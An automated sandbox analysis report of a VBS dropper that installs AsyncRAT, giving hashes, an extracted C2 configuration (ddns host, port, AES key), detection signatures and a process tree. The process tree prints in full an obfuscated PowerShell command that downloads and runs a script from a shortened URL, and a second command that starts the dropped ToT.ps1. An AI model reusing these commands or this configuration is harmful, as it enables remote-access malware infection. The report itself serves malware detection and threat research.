Analysis
-
max time kernel
87s -
max time network
146s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
24-07-2021 07:08
Static task
static1
Behavioral task
behavioral1
Sample
KHTC288.vbs
Resource
win7v20210408
General
-
Target
KHTC288.vbs
-
Size
662B
-
MD5
896c2bbb0dda248ac02ed60683858fa5
-
SHA1
42e44987ae2d842f4e6d197bde7694d18d1dc57a
-
SHA256
df8d5648e265825d946b6a3cffe442a39d04570bbe8834cfd54e2aa568fb4520
-
SHA512
090bf4471502c608a3226a02efca77c4e31b345e505c6bee21d5e12b25043a45ec71daca3a73ac81523429dab2f400d3358f40bae7e2523272d7bfa762b06c81
Malware Config
Extracted
asyncrat
0.5.7B
fat7eorami.ddns.net:1177
AsyncMutex_6SI8OkPnk
-
aes_key
G2WOlk5vwHneijb61ynCU3xRR3D20hZw
-
anti_detection
false
-
autorun
false
-
bdos
false
-
delay
omarf2r
-
host
fat7eorami.ddns.net
-
hwid
3
- install_file
-
install_folder
%AppData%
-
mutex
AsyncMutex_6SI8OkPnk
-
pastebin_config
null
-
port
1177
-
version
0.5.7B
Signatures
-
suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)
-
Async RAT payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/192-357-0x000000000040C73E-mapping.dmp asyncrat behavioral2/memory/192-356-0x0000000000400000-0x0000000000412000-memory.dmp asyncrat -
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exeflow pid process 11 2528 powershell.exe 13 2528 powershell.exe 18 2528 powershell.exe 19 2528 powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 1380 set thread context of 192 1380 powershell.exe ngentask.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exepid process 2528 powershell.exe 2528 powershell.exe 2528 powershell.exe 1380 powershell.exe 1380 powershell.exe 1380 powershell.exe 1380 powershell.exe 1380 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exengentask.exedescription pid process Token: SeDebugPrivilege 2528 powershell.exe Token: SeDebugPrivilege 1380 powershell.exe Token: SeDebugPrivilege 192 ngentask.exe -
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
WScript.exepowershell.exepowershell.exedescription pid process target process PID 632 wrote to memory of 2528 632 WScript.exe powershell.exe PID 632 wrote to memory of 2528 632 WScript.exe powershell.exe PID 2528 wrote to memory of 1380 2528 powershell.exe powershell.exe PID 2528 wrote to memory of 1380 2528 powershell.exe powershell.exe PID 1380 wrote to memory of 3492 1380 powershell.exe ngentask.exe PID 1380 wrote to memory of 3492 1380 powershell.exe ngentask.exe PID 1380 wrote to memory of 3492 1380 powershell.exe ngentask.exe PID 1380 wrote to memory of 192 1380 powershell.exe ngentask.exe PID 1380 wrote to memory of 192 1380 powershell.exe ngentask.exe PID 1380 wrote to memory of 192 1380 powershell.exe ngentask.exe PID 1380 wrote to memory of 192 1380 powershell.exe ngentask.exe PID 1380 wrote to memory of 192 1380 powershell.exe ngentask.exe PID 1380 wrote to memory of 192 1380 powershell.exe ngentask.exe PID 1380 wrote to memory of 192 1380 powershell.exe ngentask.exe PID 1380 wrote to memory of 192 1380 powershell.exe ngentask.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\KHTC288.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec Bypass gdr -*;Set-Variable 5 (&(Get-Item Variable:/E*t).Value.InvokeCommand.(((Get-Item Variable:/E*t).Value.InvokeCommand|Get-Member|?{(DIR Variable:/_).Value.Name-ilike'*ts'}).Name).Invoke('*w-*ct')Net.WebClient);Set-Variable S 'https://bit.ly/3wZ38ji'; (Get-Item Variable:/E*t).Value.InvokeCommand.InvokeScript((GCI Variable:5).Value.((((GCI Variable:5).Value|Get-Member)|?{(DIR Variable:/_).Value.Name-ilike'*wn*g'}).Name).Invoke((GV S -ValueO)))2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -noexit -exec bypass -file C:\Users\Public\ToT.ps13⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Public\ToT.ps1MD5
ae87ac57338d18d8d6a1e91bb24b9834
SHA1feeb1bdad90399c41e97d329a3d007f7fec6ab58
SHA256c098aae184b0d20e79b0e7e92bf5722d0febf1949972af6426c8f915dd1d73c1
SHA512095577ca3789215f73c3817e21bdc00b9484111f613c6d97582b365d09faf228156f7d1703496984aee44d55fe5513ab18860002f4e537495b34ea7f4635baa2
-
memory/192-375-0x0000000006040000-0x0000000006041000-memory.dmpFilesize
4KB
-
memory/192-379-0x0000000007080000-0x0000000007081000-memory.dmpFilesize
4KB
-
memory/192-356-0x0000000000400000-0x0000000000412000-memory.dmpFilesize
72KB
-
memory/192-372-0x0000000005670000-0x0000000005671000-memory.dmpFilesize
4KB
-
memory/192-382-0x00000000075D0000-0x0000000007629000-memory.dmpFilesize
356KB
-
memory/192-381-0x0000000007440000-0x00000000074CD000-memory.dmpFilesize
564KB
-
memory/192-380-0x0000000006FF0000-0x0000000006FF4000-memory.dmpFilesize
16KB
-
memory/192-373-0x0000000005FA0000-0x0000000005FA1000-memory.dmpFilesize
4KB
-
memory/192-378-0x0000000006F80000-0x0000000006F81000-memory.dmpFilesize
4KB
-
memory/192-377-0x0000000006E00000-0x0000000006E79000-memory.dmpFilesize
484KB
-
memory/192-376-0x0000000006E80000-0x0000000006E81000-memory.dmpFilesize
4KB
-
memory/192-357-0x000000000040C73E-mapping.dmp
-
memory/192-383-0x0000000007630000-0x0000000007631000-memory.dmpFilesize
4KB
-
memory/192-374-0x0000000006540000-0x0000000006541000-memory.dmpFilesize
4KB
-
memory/1380-336-0x0000020DCFF03000-0x0000020DCFF05000-memory.dmpFilesize
8KB
-
memory/1380-353-0x0000020DD0040000-0x0000020DD004E000-memory.dmpFilesize
56KB
-
memory/1380-335-0x0000020DCFF00000-0x0000020DCFF02000-memory.dmpFilesize
8KB
-
memory/1380-334-0x0000020DD0050000-0x0000020DD0051000-memory.dmpFilesize
4KB
-
memory/1380-311-0x0000000000000000-mapping.dmp
-
memory/1380-361-0x0000020DCFF06000-0x0000020DCFF08000-memory.dmpFilesize
8KB
-
memory/2528-125-0x0000026FD3950000-0x0000026FD3951000-memory.dmpFilesize
4KB
-
memory/2528-124-0x0000026FD3713000-0x0000026FD3715000-memory.dmpFilesize
8KB
-
memory/2528-114-0x0000000000000000-mapping.dmp
-
memory/2528-119-0x0000026FD3660000-0x0000026FD3661000-memory.dmpFilesize
4KB
-
memory/2528-123-0x0000026FD3710000-0x0000026FD3712000-memory.dmpFilesize
8KB
-
memory/2528-310-0x0000026FD3716000-0x0000026FD3718000-memory.dmpFilesize
8KB